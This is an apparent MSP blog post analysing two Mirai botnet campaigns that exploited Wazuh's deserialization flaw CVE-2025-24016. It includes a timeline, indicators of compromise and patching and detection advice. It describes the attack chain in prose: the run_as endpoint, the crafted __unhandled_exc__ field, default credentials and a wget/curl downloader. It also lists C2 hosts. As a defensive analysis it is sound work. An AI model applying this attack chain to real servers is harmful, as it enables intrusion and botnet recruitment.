Connect With us at Decian

ITInnovationStation

How Mirai Botnets Weaponized Wazuh’s Critical Flaw

Published by

Rinzl3r

on

How Mirai Botnets Weaponized Wazuh’s Critical Flaw

At the start of 2025, cybersecurity watchers noticed a shift: a once obscure SIEM tool, Wazuh, became a prime target. A perilously serious flaw—designated CVE‑2025‑24016—was disclosed in mid-February. Within weeks, Mirai-based botnet operators repurposed a publicly released proof-of-concept exploit to gain remote code execution on vulnerable installations. What seemed like an academic vulnerability rapidly escalated into a two-front campaign compromising SIEM servers and deploying DDoS-ready malware.

Root of the Vulnerability: Unsafe Deserialization

The flaw lies in Wazuh’s DistributedAPI, which uses JSON for inter-node communication. Internally, JSON payloads are converted back to Python objects using as_wazuh_object. However, this deserializer failed to verify contents of the input dictionary first. By inserting a crafted exception descriptor (__unhandled_exc__), an attacker could exploit Python’s eval semantics to execute arbitrary code. In short, anyone with valid API credentials—or a compromised agent—could push malicious instructions without further restriction.

Wazuh’s Patch Path

Wazuh developers addressed the flaw by switching from dynamic eval to safer parsing via ast.literal_eval, which only handles benign data structures. This fix was bundled in version 4.9.1, released alongside a public advisory and PoC sample in February 2025. Yet, a troubling reality followed: patch lag among users created a fertile environment for exploitation.

Mirai Redux: Campaign One – “LZRD Family”

By early March 2025, Akamai’s honeynet sensors began receiving exploit attempts. These mirrored the exposed PoC, exploiting the /security/user/authenticate/run_as endpoint to launch shell commands that set up a downloader script on the target server. That script—typically called w.sh—retrieved Mirai binaries from an IP (e.g., 176.65.134.62) capable of infecting various CPU architectures (ARM, MIPS, x86). This iteration, dubbed “LZRD,” included payloads known as “morte,” “neon,” “vision,” and “V3G4”—each identified by unique console prints such as “lzrd here.”

These bots followed classic Mirai behavior: scanning for vulnerable IoT, embedding in systems with lax access controls, and turning them into DDoS minions. But what set this campaign apart was its unconventional launchpoint: enterprise-grade Wazuh servers. This allowed Mirai to infiltrate deeper networks that often wield more bandwidth than home routers.

Campaign Two – “Resbot” Strikes with Italian Flair

In early May, a second wave appeared, hitting a variant endpoint on Wazuh servers. The structure resembled the LZRD campaign but used different payload architecture and command scripts. Researchers spotted campaign nomenclature hinting at Italian influence: domains such as gestisciweb.com and versioneonline.com showed regional targeting. The malware payload, sometimes referred to as “resgod,” prints “Resentual got you!” on execution.

Beyond CVE‑2025‑24016, this variant also utilized older router exploits in campaign form, chaining injection on Huawei HG532, D‑Link, RealTek SDK, and ZyXEL devices. That meant a single exploit point could potentially seed multiple infections across diverse environments, from servers to home gateways.

Timeline of Escalation

DateEvent
Feb 10Wazuh releases patch and PoC
Late FebPoC becomes publicly available via GitHub vulnerabilities repo
Early MarFirst Mirai engagement via PoC replication in global honeypots
Early MaySecond campaign surfaces, Italian-themed, targeting same vulnerability
June 9–10Multiple outlets confirm both campaigns and IoC disclosures

Technical Deep Dive: How Exploits Work

  • Entry vector: Attackers send POST requests to /security/user/authenticate/run_as with Base64 authorization (often wazuh-wui: + password derived from defaults or credential dumps).
  • Payload file: A JSON object containing crafted __unhandled_exc__ fields instructs Python to execute shell commands (wget or curl) that retrieve a downloader.
  • Stage 2 loader: The malicious script (w.sh) fetches architecture-specific Mirai binaries and executes them.
  • Mirai execution: Infected server connects to C2 infrastructure and becomes part of the botnet’s DDoS network.
  • Multi-target strategy: Some loaders include extra stages to compromise routers via FTP, telnet, or UPnP endpoints, chaining multiple exploits in one campaign.

Infrastructure & IoCs

  • Downloader host: 176.65.134.62
  • C2 domains (LZRD): nuklearcnc.duckdns.org, cbot.galaxias.cc, neon.galaxias.cc, vision.galaxias.cc
  • Italian-themed C2 (Resbot): gestisciweb.com, versioneonline.com, 104.168.101.27:62627
  • Router CVEs targeted: CVE‑2023‑1389 (TP-Link), CVE‑2017‑17215 (Huawei), CVE‑2017‑18368 (ZyXEL), RealTek SDK, UPnP SOAP injection

Why This Matters: A New Attack Vector

  1. SIEM server compromise – infecting Wazuh may allow adversaries to subvert monitoring while planting persistent backdoors.
  2. Payload versatility – payloads can transition from server to network layers by targeting routers and IoT devices.
  3. Rapid exploit adoption – entire botnets formed within weeks of PoC release, showcasing agile threat actor behavior.
  4. Multi-chain exploitation – combining new and old vulnerabilities to diversify infection paths.
  5. Regional targeting – Resbot’s domain choices hint at geo-tailored strategy, perhaps to avoid detection or segmentation.

Recommendations for Prevention

  • Upgrade Wazuh to at least 4.9.1 immediately. Delaying exposes critical systems.
  • Tighten API controls:
    • Limit API access to internal subnets or via VPN
    • Enforce end-user authentication and credential hygiene
    • Set rate limits and alert thresholds
  • Deploy IoC-based detection:
    • Use YARA/Snort rules from Akamai and other vendors
    • Monitor unusual download behavior pointing to C2 hosts
  • Audit your edge:
    • Make sure corporate routers, IoT devices, and UPnP endpoints aren’t reachable from the internet
    • Confirm robust firmware and patch management for all network devices
  • Penetration testing – simulate exploit chains to identify weak configurations before adversaries do

Real-World Response: Next Steps

  1. Conduct asset inventory to identify systems running Wazuh 4.4.0–4.9.0.
  2. Apply the 4.9.1 update across the board.
  3. Implement network segmentation and firewall rules to restrict API endpoints.
  4. Install detection rules for known IoCs — domains, IPs, script indicators.
  5. Check and patch network devices vulnerable to router-focused Mirai payloads.
  6. Set automated monitoring and alerting on script downloads to /tmp, sudden service restarts, or unusual CPU usage.
  7. Schedule regular threat simulation exercises, including deserialization-based exploit testing.
  8. Share detection routines internally and with external responders for collective defense.

Conclusion: From SIEM to Battlefield

Wazuh’s flaw turned from theoretical risk to active battlefield within weeks, fueled by Mirai’s adaptability. The campaigns targeting Wazuh illustrate a powerful adaptation: using enterprise security tools themselves as stealthy injection points for malware. The emerging Italian-centric Resbot campaign underscores how adversaries adapt regionally—not just technologically.

The key lesson? Patching and layered defenses aren’t optional—they’re urgent. Organizations must treat their visibility infrastructure (SIEMs, XDR, logging platforms) as high-value attack surfaces. Keeping those up to date, locked down, and monitored is as essential as locking down the routers and IoT endpoints they oversee.

Leave a comment

Hello,

I’m Rinzl3r

Hello! I’m Matthew, an experienced engineer at Decian, a leading Managed Service Provider (MSP) dedicated to revolutionizing IT solutions for businesses. With a passion for technology and a wealth of experience in the MSP industry, I’ve embarked on a journey to demystify the world of managed services through this blog.

My career at Decian has been a journey of constant learning and growth. Over the years, I’ve honed my skills in various aspects of IT management, from network security and cloud services to data analytics and cybersecurity. Working in an environment that fosters innovation and customer-focused solutions, I’ve had the privilege of contributing to numerous projects that have helped businesses optimize their IT strategies and enhance operational efficiency.

The inspiration to start this blog came from my interactions with business owners and clients who often expressed a need for clearer understanding and guidance in working with MSPs. Whether it’s navigating the complexities of digital transformation, ensuring cybersecurity, or leveraging technology for business growth, I realized that there’s a wealth of knowledge to be shared.

Through this blog, I aim to bridge the gap between MSPs and their clients. My goal is to provide insights, tips, and practical advice that can help business owners make informed decisions about their IT needs and how best to collaborate with an MSP like Decian. From explaining basic concepts to exploring advanced IT solutions, I strive to make this space a valuable resource for both seasoned professionals and those new to the world of managed services.

Join me on this informative journey, as we explore the dynamic and ever-evolving world of MSPs. Whether you’re an MSP client, a business owner, or just curious about the role of technology in business today, I hope to make this blog your go-to source for all things MSP.

Welcome to the blog, and let’s unravel the complexities of managed IT services together!

Let’s connect

Join the fun!

Stay updated with our latest tutorials and ideas by joining our newsletter.

Recent posts